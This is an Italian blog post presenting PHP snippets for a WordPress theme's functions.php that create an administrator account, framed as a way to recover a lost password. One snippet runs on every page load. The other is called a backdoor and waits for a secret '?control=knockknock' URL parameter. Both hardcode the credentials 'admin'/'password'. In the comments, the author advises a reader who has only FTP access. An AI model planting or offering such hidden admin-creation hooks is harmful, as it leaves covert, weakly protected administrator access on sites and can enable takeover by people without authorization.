WordPress Backdoor: creare utente amministratore da FTP

Luglio 7, 2019ServerSicurezzaWordpress2

wordpress-backdoor-creare-utente-da-ftp-1200x675.jpg

WordPress Backdoor: creare utente amministratore da FTP

Repetita iuvant, come dicevano i latini, ovvero le cose ripetute aiutano.
Difatti a quanti sarà capitato di aver dimenticato la password di accesso all’amministrazione (wp-admin) di WordPress o di avere un cliente che, non ricordandola, ci metteva davanti ad un grattacapo?

A tal proposito, abbiamo due possibilità:

  1. Creare un nuovo utente attraverso MySql (o la sua più comoda interfaccia phpMyAdmin)
  2. Creare un nuovo utente con accesso FTP (File Transfer Protocol) o SSH (Secure SHell)

In questo articolo analizzeremo nel dettaglio la seconda possibilità: ho lasciato il link a Wikipedia per rimandare alle definizioni e spiegazioni tecniche: nell’articolo ci soffermeremo solo su quanto strettamente necessario.

Sommario:

Cos’è FTP?

FTP (File Transfer Protocol) è un protocollo di rete per trasmettere dati sullo stack TCP/IP con architettura client/server.

FTP ha una pecca: pur basando l’autenticazione su username e password, la trasmissione dei dati avviene in chiaro e c’è il rischio concreto che qualcuno possa intercettarla.
Per aggiungere un livello di sicurezza si impiega un sottostrato SSL/TLS e tale variante è chiamata FTPS.

SSH: cos’è?

SSH (Secure SHell), che sostituisce di fatto Telnet, è un protocollo che permette di stabilire una sessione remota cifrata -quindi sicura- con un host remoto.
La connessione avviene tramite interfaccia a riga di comando.

Cos’è SFTP?

SFTP (SSH File Transfer Protocol) è invece il protocollo di rete che ci permette di trasferire dei dati attraverso SSH, quindi in modo sicuro.

Leggi anche Sito hackerato? Guida WordPress: pulire, riparare e risolvere problemi

Creare utente amministratore da FTP

Ora abbiamo due possibilità: creare un utente istantaneamente caricando una pagina qualsiasi oppure creare un hook (gancio) che ci consenta di attivare il nostro utente solo al momento giusto, richiamando un link speciale.
Entrambe le funzioni devono essere trascritte nel file functions.php presente all’interno della cartella del tema attivo.  La trovate contenuto in wp-content/themes.

Per verificare il tema attivo basta accedere all’amministrazione di WordPress e, nel menu laterale, andare alla voce Aspetto>Temi.

Come trovare il tema attivo WordPress

Guardiamo subito al codice delle due funzioni:

WordPress Backdoor prima versione: attivazione utente diretta


add_action( 'init', function () {
$username = 'admin';
$password = 'password';
$email_address = 'webmaster@miosito.com';
if ( ! username_exists( $username ) ) {
$user_id = wp_create_user( $username, $password, $email_address );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
} );

Dopo aver incollato la funzione dentro functions.php basterà visitare qualsiasi pagina per eseguire lo script e creare un utente admin, password password (originale, vero?) ed email asssociata webmaster@miosito.com.

WordPress Backdoor seconda Versione: attivazione utente su richiesta

Vediamo ora la seconda variante, quella più simile al concetto di backdoor a cui fa riferimento l’articolo, dato che rimane in attesa fino a che non viene attivata visitando un link ad-hoc:


add_action('wp_head', 'wploop_control');
function wploop_control() {
If ($_GET['control'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('admin', 'password');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}

In questo caso basterà visitare la pagina tuodominio.com/?control=knockknock per eseguire la nostra azione personalizzata tramite hook: a seguito potrete accedere alla pagina wp-admin con le credenziali admin e password.

Leggi anche Montare condivisione di rete all’avvio di macOS

Hai bisogno di una consulenza per il tuo sito internet?

Il mondo del web e della comunicazione è in costante evoluzione, proprio per questo motivo, che tu sia un’azienda, un artista o un aspirante influencer affidarti a un professionista del settore è la scelta migliore che tu possa prendere per dare al tuo business la vetrina che si merita. Sarebbe un peccato non valorizzare un prodotto/servizio che ha tutte le qualità per affermarsi sul mercato, non credi? Chiedi informazioni qui per saperne di più, potresti scoprire opportunità a cui non avevi mai pensato.

Ti è piaciuto l’articolo? Commenta nel box qui sotto!

<<Ritorna al blog

2 commenti

  • Cristian De Angelis

    Novembre 15, 2019 at 12:14 pm

    Ciao Marcello, guida super utilissima.

    Ho un problema, come provo ad accedere con le nuove credenziali mi da questo messaggio:

    “ACCOUNT IN SOSPESO : Il tuo account non è attivo. Un amministratore deve attivare il tuo account prima di poter accedere.”

    Come posso risolvere?

    Purtroppo ho solo l’accesso FTP al sito, non ho le credenziali dell’hosting e tantomeno del Database.

    Reply

    • Marcello

      Novembre 15, 2019 at 1:40 pm

      Ciao Cristian, se hai accesso ftp ti consiglio la versione con attivazione diretta. Fammi sapere se hai risolto!

      Reply

Lascia una risposta

La tua email non verrà pubblicata. I campi richiesti sono contrassegnati *

precedenteHowto Varnish: acceleratore http per il tuo sito internet

prossimoColor Picker macOS personalizzato